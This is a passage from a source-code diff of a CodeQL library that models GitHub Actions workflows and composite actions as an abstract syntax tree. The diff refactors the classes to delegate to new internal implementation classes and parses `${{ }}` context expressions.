echo "hello" - // - run: > - // echo "hello" - // echo "hello" - style = ">" and - sl = loc.getStartLine() + 1 and - el = loc.getEndLine() and - sc = n.getKeyNode().getLocation().getStartColumn() and - ec = loc.getEndColumn() - ) - } - - override Location getLocation() { - exists(Location loc | - this.hasLocationInfo(loc.getFile().getAbsolutePath(), loc.getStartLine(), - loc.getStartColumn(), loc.getEndLine(), loc.getEndColumn()) and - result = loc - ) - } - - predicate hasLocationInfo(string path, int sl, int sc, int el, int ec) { - path = n.asYamlNode().getFile().getAbsolutePath() and - this.expressionLocation(sl, sc, el, ec) - } - - override File getFile() { result = n.asYamlNode().getFile() } -} - -/** - * Base class for the AST tree. Based on YamlNode from the Yaml library. - */ -class WorkflowNode extends AstNode, TWorflowNode { - YamlNode n; - - WorkflowNode() { this = TWorflowNode(n) } - - override AstNode getParentNode() { result = TWorflowNode(n.getParentNode()) } - - override AstNode getAChildNode() { - result = TWorflowNode(n.getAChildNode()) - or - exists(ExpressionNode e | e.getParentNode() = this | result = e) - } - - override string getAPrimaryQlClass() { result = n.getAPrimaryQlClass() } - - override Location getLocation() { result = n.getLocation() } - - override File getFile() { result = n.getFile() } - - YamlNode asYamlNode() { result = n } - - YamlMapping asYamlMapping() { result = n } - - override string toString() { result = n.toString() } } /** A common class for `env` in workflow, job or step. */ -abstract class Env extends WorkflowNode { } +abstract class Env extends AstNode instanceof EnvImpl { + /** Gets an environment variable value given its name. */ + ScalarValueImpl getEnvVarValue(string name) { result = super.getEnvVarValue(name) } -/** A workflow level `env` mapping. */ -class WorkflowEnv extends Env { - Workflow workflow; + /** Gets an environment variable value. */ + ScalarValueImpl getAnEnvVarValue() { result = super.getAnEnvVarValue() } - WorkflowEnv() { - n instanceof YamlMapping and - workflow.asYamlMapping().lookup("env") = this.asYamlNode() - } + /** Gets an environment variable expressin given its name. */ + ExpressionImpl getEnvVarExpr(string name) { result = super.getEnvVarExpr(name) } - /** Gets the workflow this field belongs to. */ - Workflow getWorkflow() { result = workflow } -} - -/** A job level `env` mapping. */ -class JobEnv extends Env { - Job job; - - JobEnv() { job.asYamlMapping().lookup("env") = this.asYamlNode() } - - /** Gets the job this field belongs to. */ - Job getJob() { result = job } -} - -/** A step level `env` mapping. */ -class StepEnv extends Env { - Step step; - - StepEnv() { step.asYamlMapping().lookup("env") = this.asYamlNode() } - - /** Gets the step this field belongs to. */ - Step getStep() { result = step } + /** Gets an environment variable expression. */ + ExpressionImpl getAnEnvVarExpr() { result = super.getAnEnvVarExpr() } } /** * A custom composite action. This is a mapping at the top level of an Actions YAML action file. * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions. */ -class CompositeAction extends WorkflowNode { - //class CompositeAction extends WorkflowNode, YamlDocument, YamlMapping { - CompositeAction() { - n instanceof YamlDocument and - n instanceof YamlMapping and - this.getFile().getBaseName() = ["action.yml", "action.yaml"] and - this.asYamlMapping().lookup("runs").(YamlMapping).lookup("using").(YamlScalar).getValue() = - "composite" - } +class CompositeAction extends AstNode instanceof CompositeActionImpl { + Runs getRuns() { result = super.getRuns() } - /** Gets the `runs` mapping. */ - Runs getRuns() { result.asYamlNode() = this.asYamlMapping().lookup("runs") } + Outputs getOutputs() { result = super.getOutputs() } - Outputs getOutputs() { result.asYamlNode() = this.asYamlMapping().lookup("outputs") } + Expression getAnOutputExpr() { result = super.getAnOutputExpr() } - ExpressionNode getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } + Expression getOutputExpr(string outputName) { result = super.getOutputExpr(outputName) } - ExpressionNode getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } + Input getAnInput() { result = super.getAnInput() } - Input getAnInput() { - this.asYamlMapping().lookup("inputs").(YamlMapping).maps(result.asYamlNode(), _) - } - - Input getInput(string name) { - this.asYamlMapping().lookup("inputs").(YamlMapping).maps(result.asYamlNode(), _) and - result.asYamlNode().(YamlString).getValue() = name - } + Input getInput(string inputName) { result = super.getInput(inputName) } } /** * An `runs` mapping in a custom composite action YAML. * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions#runs */ -class Runs extends WorkflowNode { - CompositeAction action; +class Runs extends AstNode instanceof RunsImpl { + CompositeAction getAction() { result = super.getAction() } - Runs() { - n instanceof YamlMapping and - action.asYamlMapping().lookup("runs") = this.asYamlNode() - } + Step getAStep() { result = super.getAStep() } - /** Gets the action that this `runs` mapping is in. */ - CompositeAction getAction() { result = action } - - /** Gets any steps that are defined within this job. */ - Step getAStep() { - result.asYamlNode() = this.asYamlMapping().lookup("steps").(YamlSequence).getElementNode(_) - } - - /** Gets the step at the given index within this job. */ - Step getStep(int i) { - result.asYamlNode() = this.asYamlMapping().lookup("steps").(YamlSequence).getElementNode(i) - } + Step getStep(int i) { result = super.getStep(i) } } /** * An Actions workflow. This is a mapping at the top level of an Actions YAML workflow file. * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. */ -class Workflow extends WorkflowNode { - Workflow() { n instanceof YamlDocument and n instanceof YamlMapping } +class Workflow extends AstNode instanceof WorkflowImpl { + Env getEnv() { result = super.getEnv() } - /** Gets the `jobs` mapping from job IDs to job definitions in this workflow. */ - YamlMapping getJobs() { result = this.asYamlMapping().lookup("jobs") } + string getName() { result = super.getName() } - /** Gets the 'global' `env` mapping in this workflow. */ - WorkflowEnv getEnv() { result.asYamlNode() = this.asYamlMapping().lookup("env") } + Job getAJob() { result = super.getAJob() } - /** Gets the name of the workflow. */ - string getName() { result = this.asYamlMapping().lookup("name").(YamlString).getValue() } + Job getJob(string jobId) { result = super.getJob(jobId) } - /** Gets the job within this workflow with the given job ID. */ - Job getJob(string jobId) { result.getWorkflow() = this and result.getId() = jobId } + predicate hasTriggerEvent(string trigger) { super.hasTriggerEvent(trigger) } - /** Gets a job within this workflow */ - Job getAJob() { result = this.getJob(_) } + string getATriggerEvent() { result = super.getATriggerEvent() } - predicate hasTriggerEvent(string trigger) { - exists(YamlNode y | - y = this.asYamlMapping().lookup("on").(YamlMappingLikeNode).getNode(trigger) - ) - } + Permissions getPermissions() { result = super.getPermissions() } - string getATriggerEvent() { - exists(YamlNode y | y = this.asYamlMapping().lookup("on").(YamlMappingLikeNode).getNode(result)) - } - - Permissions getPermissions() { result.asYamlNode() = this.asYamlMapping().lookup("permissions") } - - Strategy getStrategy() { result.asYamlNode() = this.asYamlMapping().lookup("strategy") } + Strategy getStrategy() { result = super.getStrategy() } } -class ReusableWorkflow extends Workflow { - YamlValue workflow_call; +class ReusableWorkflow extends Workflow instanceof ReusableWorkflowImpl { + Outputs getOutputs() { result = super.getOutputs() } - ReusableWorkflow() { - n instanceof YamlMapping and - this.asYamlMapping().lookup("on").(YamlMappingLikeNode).getNode("workflow_call") = workflow_call - } + Expression getAnOutputExpr() { result = super.getAnOutputExpr() } - Outputs getOutputs() { result.asYamlNode() = workflow_call.(YamlMapping).lookup("outputs") } + Expression getOutputExpr(string outputName) { result = super.getOutputExpr(outputName) } - ExpressionNode getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } + Input getAnInput() { result = super.getAnInput() } - ExpressionNode getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } - - Input getAnInput() { - workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result.asYamlNode(), _) - } - - Input getInput(string name) { - workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result.asYamlNode(), _) and - result.asYamlNode().(YamlString).getValue() = name - } + Input getInput(string inputName) { result = super.getInput(inputName) } } -class Input extends WorkflowNode { - YamlMapping parent; +class Input extends AstNode instanceof InputImpl { } - Input() { parent.lookup("inputs").(YamlMapping).maps(this.asYamlNode(), _) } -} +class Outputs extends AstNode instanceof OutputsImpl { + Expression getAnOutputExpr() { result = super.getAnOutputExpr() } -class Outputs extends WorkflowNode { - YamlMapping parent; - - Outputs() { - n instanceof YamlMapping and - parent.lookup("outputs") = this.asYamlNode() - } - - /** - * Gets an output expression. - */ - ExpressionNode getAnOutputExpr() { result = this.getOutputExpr(_) } - - /** - * Gets a specific output expression by name. - */ - ExpressionNode getOutputExpr(string name) { - exists(StringValue l | - l.getAnExpression() = result and - ( - this.asYamlMapping().lookup(name).(YamlMapping).lookup("value") = l.asYamlNode() or - this.asYamlMapping().lookup(name) = l.asYamlNode() - ) - ) - } - - string getAnOutputName() { - this.asYamlMapping().maps(any(YamlString s | s.getValue() = result), _) - } + Expression getOutputExpr(string outputName) { result = super.getOutputExpr(outputName) } + // TODO: REMOVE override string toString() { result = "Job outputs node" } } -class Permissions extends WorkflowNode { - YamlMapping parent; +class Permissions extends AstNode instanceof PermissionsImpl { } - Permissions() { - n instanceof YamlMapping and - parent.lookup("permissions") = this.asYamlNode() - } -} +class Strategy extends AstNode instanceof StrategyImpl { + Expression getMatrixVarExpr(string varName) { result = super.getMatrixVarExpr(varName) } -class Strategy extends WorkflowNode { - YamlMapping parent; - - Strategy() { - n instanceof YamlMapping and - parent.lookup("strategy") = this.asYamlNode() - } - - /** - * Gets a specific matric expression (YamlMapping) by name. - */ - StringValue getMatrixVar(string name) { - this.asYamlMapping().lookup("matrix").(YamlMapping).lookup(name) = result.asYamlNode() - } - - /** - * Gets a specific matric expression (YamlMapping) by name. - */ - StringValue getAMatrixVar() { - this.asYamlMapping().lookup("matrix").(YamlMapping).lookup(_) = result.asYamlNode() - } + Expression getAMatrixVarExpr() { result = super.getAMatrixVarExpr() } } /** * https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idneeds */ -class Needs extends WorkflowNode { - Job job; - - Needs() { - n instanceof YamlMappingLikeNode and - job.asYamlMapping().lookup("needs") = this.asYamlNode() - } - - Job getJob() { result = job } - - Job getANeededJob() { - result.getId() = this.asYamlNode().(YamlMappingLikeNode).getNode(_).(YamlString).getValue() and - result.getFile() = job.getFile() - } +class Needs extends AstNode instanceof NeedsImpl { + Job getANeededJob() { result = super.getANeededJob() } } /** * An Actions job within a workflow. * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobs. */ -class Job extends WorkflowNode { - string jobId; - Workflow workflow; +abstract class Job extends AstNode instanceof JobImpl { + string getId() { result = super.getId() } - Job() { - n instanceof YamlMapping and - this.asYamlNode() = workflow.getJobs().lookup(jobId) - } + Workflow getWorkflow() { result = super.getWorkflow() } - /** - * Gets the ID of this job, as a string. - * This is the job's key within the `jobs` mapping. - */ - string getId() { result = jobId } + Job getANeededJob() { result = super.getANeededJob() } - /** Gets any steps that are defined within this job. */ - Step getAStep() { - result.asYamlNode() = this.asYamlMapping().lookup("steps").(YamlSequence).getElementNode(_) - } + Outputs getOutputs() { result = super.getOutputs() } - /** Gets the step at the given index within this job. */ - Step getStep(int i) { - result.asYamlNode() = this.asYamlMapping().lookup("steps").(YamlSequence).getElementNode(i) - } + Expression getAnOutputExpr() { result = super.getAnOutputExpr() } - /** Gets the workflow this job belongs to. */ - Workflow getWorkflow() { result = workflow } + Expression getOutputExpr(string outputName) { result = super.getOutputExpr(outputName) } - /** - * Gets a needed job. - * eg: - * - needs: [job1, job2] - */ - Job getANeededJob() { - exists(Needs needs | - needs.getJob() = this and - result = needs.getANeededJob() - ) - } + Env getEnv() { result = super.getEnv() } - /** - * Gets the declaration of the outputs for the job. - * eg: - * out1: ${steps.foo.bar} - * out2: ${steps.foo.baz} - */ - Outputs getOutputs() { result.asYamlNode() = this.asYamlMapping().lookup("outputs") } + If getIf() { result = super.getIf() } - ExpressionNode getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } + Permissions getPermissions() { result = super.getPermissions() } - ExpressionNode getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } + Strategy getStrategy() { result = super.getStrategy() } +} - /** - * Reusable workflow jobs may have Uses children - * eg: - * call-job: - * uses: ./.github/workflows/reusable_workflow.yml - * with: - * arg1: value1 - */ - UsesJob getUses() { result.getJob() = this } +class LocalJob extends Job instanceof LocalJobImpl { + Step getAStep() { result = super.getAStep() } - predicate usesReusableWorkflow() { - this.asYamlMapping().maps(any(YamlString s | s.getValue() = "uses"), _) - } - - If getIf() { result.asYamlNode() = this.asYamlMapping().lookup("if") } - - Permissions getPermissions() { result.asYamlNode() = this.asYamlMapping().lookup("permissions") } - - Strategy getStrategy() { result.asYamlNode() = this.asYamlMapping().lookup("strategy") } - - override string toString() { result = "Job: " + jobId } + Step getStep(int i) { result = super.getStep(i) } } /** * A step within an Actions job. * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idsteps. */ -class Step extends WorkflowNode { - YamlMapping parent; +class Step extends AstNode instanceof StepImpl { + string getId() { result = super.getId() } - Step() { parent.lookup("steps").(YamlSequence).getElementNode(_) = this.asYamlNode() } + Env getEnv() { result = super.getEnv() } - /** Gets the ID of this step, if any. */ - string getId() { result = this.asYamlMapping().lookup("id").(YamlString).getValue() } - - /** Gets the `job` this step belongs to, if the step belongs to a `job` in a workflow. Has no result if the step belongs to `runs` in a custom composite action. */ - Job getJob() { result.asYamlNode() = parent } - - /** Gets the value of the `if` field in this step, if any. */ - If getIf() { result.asYamlNode() = this.asYamlMapping().lookup("if") } + If getIf() { result = super.getIf() } } /** * An If node representing a conditional statement. */ -class If extends WorkflowNode { - WorkflowNode parent; - - If() { - (parent instanceof Step or parent instanceof Job) and - parent.asYamlMapping().lookup("if") = this.asYamlNode() - } - - WorkflowNode getEnclosingNode() { result = parent } - - string getCondition() { result = this.asYamlNode().(YamlScalar).getValue() } +class If extends AstNode instanceof IfImpl { + string getCondition() { result = super.getCondition() } } -/** - * Abstract class representing a call to a 3rd party action or reusable workflow. - */ -abstract class Uses extends WorkflowNode { - abstract string getCallee(); +abstract class Uses extends AstNode instanceof UsesImpl { + string getCallee() { result = super.getCallee() } - abstract string getVersion(); + string getVersion() { result = super.getVersion() } - abstract ExpressionNode getArgumentExpr(string key); - - override string toString() { result = "Uses Step" } + Expression getArgumentExpr(string argName) { result = super.getArgumentExpr(argName) } } -/** - * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. - * The capture groups are: - * 1: The owner of the repository where the Action comes from, e.g. `actions` in `actions/checkout@v2` - * 2: The name of the repository where the Action comes from, e.g. `checkout` in `actions/checkout@v2`. - * 3: The version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. - */ -private string usesParser() { result = "([^/]+)/([^/@]+)@(.+)" } +class UsesStep extends Step, Uses instanceof UsesStepImpl { } -/** - * A Uses step represents a call to an action that is defined in a GitHub repository. - */ -class UsesStep extends Step, Uses { - YamlScalar uses; - - UsesStep() { this.asYamlMapping().maps(any(YamlScalar s | s.getValue() = "uses"), uses) } - - /** Gets the owner and name of the repository where the Action comes from, e.g. `actions/checkout` in `actions/checkout@v2`. */ - override string getCallee() { - result = - ( - uses.getValue().regexpCapture(usesParser(), 1) + "/" + - uses.getValue().regexpCapture(usesParser(), 2) - ).toLowerCase() - } - - /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ - override string getVersion() { result = uses.getValue().regexpCapture(usesParser(), 3) } - - override Expression getArgumentExpr(string key) { - exists(StringValue l | - l.asYamlNode() = this.asYamlMapping().lookup("with").(YamlMapping).lookup(key) and - result = l.getAnExpression() - ) - } - - override string toString() { - if exists(this.getId()) then result = "Uses Step: " + this.getId() else result = "Uses Step" - } -} - -/** - * A Uses step represents a call to an action that is defined in a GitHub repository. - */ -class UsesJob extends Uses { - UsesJob() { - this instanceof Job and - this.asYamlMapping().maps(any(YamlString s | s.getValue() = "uses"), _) - } - - Job getJob() { result = this } - - /** - * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. - * local repo: octo-org/this-repo/.github/workflows/workflow-1.yml@172239021f7ba04fe7327647b213799853a9eb89 - * local repo: ./.github/workflows/workflow-2.yml - * remote repo: octo-org/another-repo/.github/workflows/workflow.yml@v1 - */ - private string repoUsesParser() { result = "([^/]+)/([^/]+)/([^@]+)@(.+)" } - - private string pathUsesParser() { result = "\\./(.+)" } - - override string getCallee() { - exists(YamlString name | - this.asYamlMapping().lookup("uses") = name and - if name.getValue().matches("./%") - then result = name.getValue().regexpCapture(this.pathUsesParser(), 1) - else - result = - name.getValue().regexpCapture(this.repoUsesParser(), 1) + "/" + - name.getValue().regexpCapture(this.repoUsesParser(), 2) + "/" + - name.getValue().regexpCapture(this.repoUsesParser(), 3) - ) - } - - /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ - override string getVersion() { - exists(YamlString name | - this.asYamlMapping().lookup("uses") = name and - if not name.getValue().matches("\\.%") - then result = name.getValue().regexpCapture(this.repoUsesParser(), 4) - else none() - ) - } - - override ExpressionNode getArgumentExpr(string key) { - exists(StringValue l | - this.asYamlMapping().lookup("with").(YamlMapping).lookup(key) = l.asYamlNode() and - result = l.getAnExpression() - ) - } -} +class ExternalJob extends Job, Uses instanceof ExternalJobImpl { } /** * A `run` field within an Actions job step, which runs command-line programs using an operating system shell. * See https://docs.github.com/en/free-pro-team@latest/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepsrun. */ -class Run extends Step { - StringValue script; +class Run extends Step instanceof RunImpl { + string getScript() { result = super.getScript() } - Run() { this.asYamlMapping().maps(any(YamlString s | s.getValue() = "run"), script.asYamlNode()) } - - StringValue getScript() { result = script } - - override string toString() { - if exists(this.getId()) then result = "Run Step: " + this.getId() else result = "Run Step" - } + Expression getAnScriptExpr() { result = super.getAnScriptExpr() } } -/** - * A YamlString part of a YamlSequence or YamlMapping values. - */ -class StringValue extends WorkflowNode { - YamlNode keyNode; +abstract class ContextExpression extends AstNode instanceof ContextExpressionImpl { + string getFieldName() { result = super.getFieldName() } - StringValue() { - n instanceof YamlString and - exists(YamlCollection c | - c = keyNode and - ( - c instanceof YamlMapping and - //c.(YamlMapping).maps(_, this.asYamlNode()) - exists(int i | this.asYamlNode() = c.(YamlMapping).getValueNode(i)) - or - c instanceof YamlSequence and - c.(YamlSequence).getElementNode(_) = this.asYamlNode() - ) - ) - } - - string getValue() { result = this.asYamlNode().(YamlString).getValue() } - - YamlNode getKeyNode() { result = keyNode } - - ExpressionNode getAnExpression() { result = this.getAChildNode() } + AstNode getTarget() { result = super.getTarget() } } -/** - * Holds if `${{ e }}` is a GitHub Actions expression evaluated within this YAML string. - * See https://docs.github.com/en/free-pro-team@latest/actions/reference/context-and-expression-syntax-for-github-actions. - * Only finds simple expressions like `${{ github.event.comment.body }}`, where the expression contains only alphanumeric characters, underscores, dots, or dashes. - * Does not identify more complicated expressions like `${{ fromJSON(env.time) }}`, or ${{ format('{{Hello {0}!}}', github.event.head_commit.author.name) }} - */ -string getASimpleReferenceExpression(StringValue node, int offset) { - // We use `regexpFind` to obtain *all* matches of `${{...}}`, - // not just the last (greedy match) or first (reluctant match). - result = - node.getValue() - .regexpFind("\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\(\\)\\.\\-]+\\s*\\}\\}", _, offset) - .regexpCapture("(\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+\\s*\\}\\})", 1) -} +class StepsExpression extends ContextExpression instanceof StepsExpressionImpl { } -class Expression extends ExpressionNode { } +class NeedsExpression extends ContextExpression instanceof NeedsExpressionImpl { } -/** - * A ${{}} expression accessing a context variable such as steps, needs, jobs, env, inputs, or matrix. - * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability - */ -class ContextExpression extends Expression { - ContextExpression() { - expression - .regexpMatch([ - stepsCtxRegex(), needsCtxRegex(), jobsCtxRegex(), envCtxRegex(), inputsCtxRegex(), - matrixCtxRegex() - ]) - } +class JobsExpression extends ContextExpression instanceof JobsExpressionImpl { } - abstract string getFieldName(); +class InputsExpression extends ContextExpression instanceof InputsExpressionImpl { } - abstract AstNode getTarget(); -} +class EnvExpression extends ContextExpression instanceof EnvExpressionImpl { } -private string stepsCtxRegex() { - result = wrapRegexp("steps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") -} - -private string needsCtxRegex() { - result = wrapRegexp("needs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") -} - -private string jobsCtxRegex() { - result = wrapRegexp("jobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") -} - -private string envCtxRegex() { result = wrapRegexp("env\\.([A-Za-z0-9_-]+)") } - -private string matrixCtxRegex() { result = wrapRegexp("matrix\\.([A-Za-z0-9_-]+)") } - -private string inputsCtxRegex() { - result = wrapRegexp(["inputs\\.([A-Za-z0-9_-]+)", "github\\.event\\.inputs\\.([A-Za-z0-9_-]+)"]) -} - -bindingset[regex] -private string wrapRegexp(string regex) { - result = ["\\b" + regex + "\\b", "fromJSON\\(" + regex + "\\)", "toJSON\\(" + regex + "\\)"] -} - -/** - * Holds for an expression accesing the `steps` context. - * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability - * e.g. `${{ steps.changed-files.outputs.all_changed_files }}` - */ -class StepsExpression extends ContextExpression { - string stepId; - string fieldName; - - StepsExpression() { - expression.regexpMatch(stepsCtxRegex()) and - stepId = expression.regexpCapture(stepsCtxRegex(), 1) and - fieldName = expression.regexpCapture(stepsCtxRegex(), 2) - } - - override string getFieldName() { result = fieldName } - - override AstNode getTarget() { - this.getFile() = result.getFile() and - result.(Step).getId() = stepId - } -} - -/** - * Holds for an expression accesing the `needs` context. - * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability - * e.g. `${{ needs.job1.outputs.foo}}` - */ -class NeedsExpression extends ContextExpression { - Job neededJob; - string neededJobId; - string fieldName; - - NeedsExpression() { - expression.regexpMatch(needsCtxRegex()) and - neededJobId = expression.regexpCapture(needsCtxRegex(), 1) and - fieldName = expression.regexpCapture(needsCtxRegex(), 2) and - neededJob.getId() = neededJobId - } - - predicate usesReusableWorkflow() { neededJob.usesReusableWorkflow() } - - override string getFieldName() { result = fieldName } - - override AstNode getTarget() { - neededJob.getFile() = this.getFile() and - this.getJob().getANeededJob() = neededJob and - ( - // regular jobs - neededJob.getOutputs() = result - or - // reusable workflow calling jobs - neededJob.getUses() = result - ) - } -} - -/** - * Holds for an expression accesing the `jobs` context. - * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability - * e.g. `${{ jobs.job1.outputs.foo}}` (within reusable workflows) - */ -class JobsExpression extends ContextExpression { - string jobId; - string fieldName; - - JobsExpression() { - expression.regexpMatch(jobsCtxRegex()) and - jobId = expression.regexpCapture(jobsCtxRegex(), 1) and - fieldName = expression.regexpCapture(jobsCtxRegex(), 2) - } - - override string getFieldName() { result = fieldName } - - override AstNode getTarget() { - exists(Job job | - job.getId() = jobId and - job.getFile() = this.getFile() and - job.getOutputs() = result - ) - } -} - -/** - * Holds for an expression the `inputs` context. - * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability - * e.g. `${{ inputs.foo }}` - */ -class InputsExpression extends ContextExpression { - string fieldName; - - InputsExpression() { - expression.regexpMatch(inputsCtxRegex()) and - fieldName = expression.regexpCapture(inputsCtxRegex(), 1) - } - - override string getFieldName() { result = fieldName } - - override AstNode getTarget() { - result.getFile() = this.getFile() and - ( - exists(ReusableWorkflow w | w.getInput(fieldName) = result) - or - exists(CompositeAction a | a.getInput(fieldName) = result) - ) - } -} - -/** - * Holds for an expression accesing the `env` context. - * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability - * e.g. `${{ env.foo }}` - */ -class EnvExpression extends ContextExpression { - string fieldName; - - EnvExpression() { - expression.regexpMatch(envCtxRegex()) and - fieldName = expression.regexpCapture(envCtxRegex(), 1) - } - - override string getFieldName() { result = fieldName } - - override AstNode getTarget() { - exists(WorkflowNode s | - s.getInScopeEnvVarExpr(fieldName) = result and - s.getAChildNode*() = this - ) - } -} - -/** - * Holds for an expression accesing the `matrix` context. - * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability - * e.g. `${{ matrix.foo }}` - */ -class MatrixExpression extends ContextExpression { - string fieldName; - - MatrixExpression() { - expression.regexpMatch(matrixCtxRegex()) and - fieldName = expression.regexpCapture(matrixCtxRegex(), 1) - } - - override string getFieldName() { result = fieldName } - - override AstNode getTarget() { - exists(Workflow w | - w.getStrategy().getMatrixVar(fieldName) = result and - w.getAChildNode*() = this - ) - or - exists(Job j | - j.getStrategy().getMatrixVar(fieldName) = result and - j.getAChildNode*() = this - ) - } -} +class MatrixExpression extends ContextExpression instanceof MatrixExpressionImpl { } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll new file mode 100644 index 00000000000..63b25229a58 --- /dev/null +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -0,0 +1,1001 @@ +private import codeql.actions.ast.internal.Yaml +private import codeql.Locations + +/** + * Gets the length of each line in the StringValue . + */ +bindingset[text] +int lineLength(string text, int idx) { + exists(string line | line = text.splitAt("\n", idx) and result = line.length() + 1) +} + +/** + * Gets the sum of the length of the lines up to the given index. + */ +bindingset[text] +int partialLineLengthSum(string text, int i) { + i in [0 .. count(text.splitAt("\n"))] and + result = sum(int j, int length | j in [0 .. i] and length = lineLength(text, j) | length) +} + +/** + * Holds if `${{ e }}` is a GitHub Actions expression evaluated within this YAML string. + * See https://docs.github.com/en/free-pro-team@latest/actions/reference/context-and-expression-syntax-for-github-actions. + * Only finds simple expressions like `${{ github.event.comment.body }}`, where the expression contains only alphanumeric characters, underscores, dots, or dashes. + * Does not identify more complicated expressions like `${{ fromJSON(env.time) }}`, or ${{ format('{{Hello {0}!}}', github.event.head_commit.author.name) }} + */ +string getASimpleReferenceExpression(YamlString s, int offset) { + // We use `regexpFind` to obtain *all* matches of `${{...}}`, + // not just the last (greedy match) or first (reluctant match). + result = + s.getValue() + .regexpFind("\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\(\\)\\.\\-]+\\s*\\}\\}", _, offset) + .regexpCapture("(\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+\\s*\\}\\})", 1) +} + +private newtype TAstNode = + TExpressionNode(YamlNode key, YamlScalar value, string raw, int exprOffset) { + raw = getASimpleReferenceExpression(value, exprOffset) and + exists(YamlMapping m | + ( + exists(int i | value = m.getValueNode(i) and key = m.getKeyNode(i)) + or + exists(int i | + m.getValueNode(i).(YamlSequence).getElementNode(_) = value and key = m.getKeyNode(i) + ) + ) + ) + } or + TCompositeAction(YamlMapping n) { + n instanceof YamlDocument and + n.getFile().getBaseName() = ["action.yml", "action.yaml"] and + n.lookup("runs").(YamlMapping).lookup("using").(YamlScalar).getValue() = "composite" + } or + TWorkflowNode(YamlMapping n) { + n instanceof YamlDocument and + n.lookup("jobs") instanceof YamlMapping + } or + TRunsNode(YamlMapping n) { exists(CompositeActionImpl a | a.getNode().lookup("runs") = n) } or + TInputsNode(YamlMapping n) { exists(YamlMapping m | m.lookup("inputs") = n) } or + TInputNode(YamlValue n) { exists(YamlMapping m | m.lookup("inputs").(YamlMapping).maps(n, _)) } or + TOutputsNode(YamlMapping n) { exists(YamlMapping m | m.lookup("outputs") = n) } or + TPermissionsNode(YamlMapping n) { exists(YamlMapping m | m.lookup("permissions") = n) } or + TStrategyNode(YamlMapping n) { exists(YamlMapping m | m.lookup("strategy") = n) } or + TNeedsNode(YamlMappingLikeNode n) { exists(YamlMapping m | m.lookup("needs") = n) } or + TJobNode(YamlMapping n) { exists(YamlMapping w | w.lookup("jobs").(YamlMapping).lookup(_) = n) } or + TStepNode(YamlMapping n) { + exists(YamlMapping m | m.lookup("steps").(YamlSequence).getElementNode(_) = n) + } or + TIfNode(YamlValue n) { exists(YamlMapping m | m.lookup("if") = n) } or + TEnvNode(YamlMapping n) { exists(YamlMapping m | m.lookup("env") = n) } or + TScalarValueNode(YamlScalar n) { + exists(YamlMapping m | m.maps(_, n) or m.lookup(_).(YamlSequence).getElementNode(_) = n) + } + +abstract class AstNodeImpl extends TAstNode { + abstract AstNodeImpl getAChildNode(); + + abstract AstNodeImpl getParentNode(); + + abstract string getAPrimaryQlClass(); + + abstract Location getLocation(); + + abstract YamlNode getNode(); + + abstract string toString(); + + /** + * Gets the enclosing Job. + */ + JobImpl getEnclosingJob() { result.getAChildNode*() = this.getParentNode() } + + /** + * Gets the enclosing workflow statement. + */ + WorkflowImpl getEnclosingWorkflow() { this = result.getAChildNode*() } + + /** + * Gets a environment variable expression by name in the scope of the current node. + */ + ExpressionImpl getInScopeEnvVarExpr(string name) { + exists(EnvImpl env | + env.getNode().maps(any(YamlScalar s | s.getValue() = name), result.getParentNode().getNode()) and + env.getParentNode().getAChildNode*() = this + ) + } +} + +class ScalarValueImpl extends AstNodeImpl, TScalarValueNode { + YamlScalar value; + + ScalarValueImpl() { this = TScalarValueNode(value) } + + override string toString() { result = value.getValue() } + + override ExpressionImpl getAChildNode() { result.getParentNode() = this } + + override AstNodeImpl getParentNode() { + exists(AstNodeImpl n | n.getAChildNode() = this and result = n) + } + + override string getAPrimaryQlClass() { result = "ScalarValueImpl" } + + override Location getLocation() { result = value.getLocation() } + + override YamlNode getNode() { result = value } +} + +class ExpressionImpl extends AstNodeImpl, TExpressionNode { + YamlNode key; + YamlString value; + string rawExpression; + string expression; + int exprOffset; + + ExpressionImpl() { + this = TExpressionNode(key, value, rawExpression, exprOffset - 1) and + expression = + rawExpression.regexpCapture("\\$\\{\\{\\s*([A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+)\\s*\\}\\}", 1) + } + + override string toString() { result = expression } + + override AstNodeImpl getAChildNode() { none() } + + override AstNodeImpl getParentNode() { result.getNode() = value } + + override string getAPrimaryQlClass() { result = "ExpressionNode" } + + override YamlNode getNode() { none() } + + 